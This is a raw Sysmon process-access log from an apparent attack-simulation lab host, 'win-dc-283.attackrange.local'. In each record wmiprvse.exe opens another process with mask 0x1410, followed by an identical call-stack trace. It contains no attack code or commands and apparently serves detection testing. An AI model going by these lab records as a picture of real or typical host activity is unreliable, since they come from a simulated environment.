15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.225{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 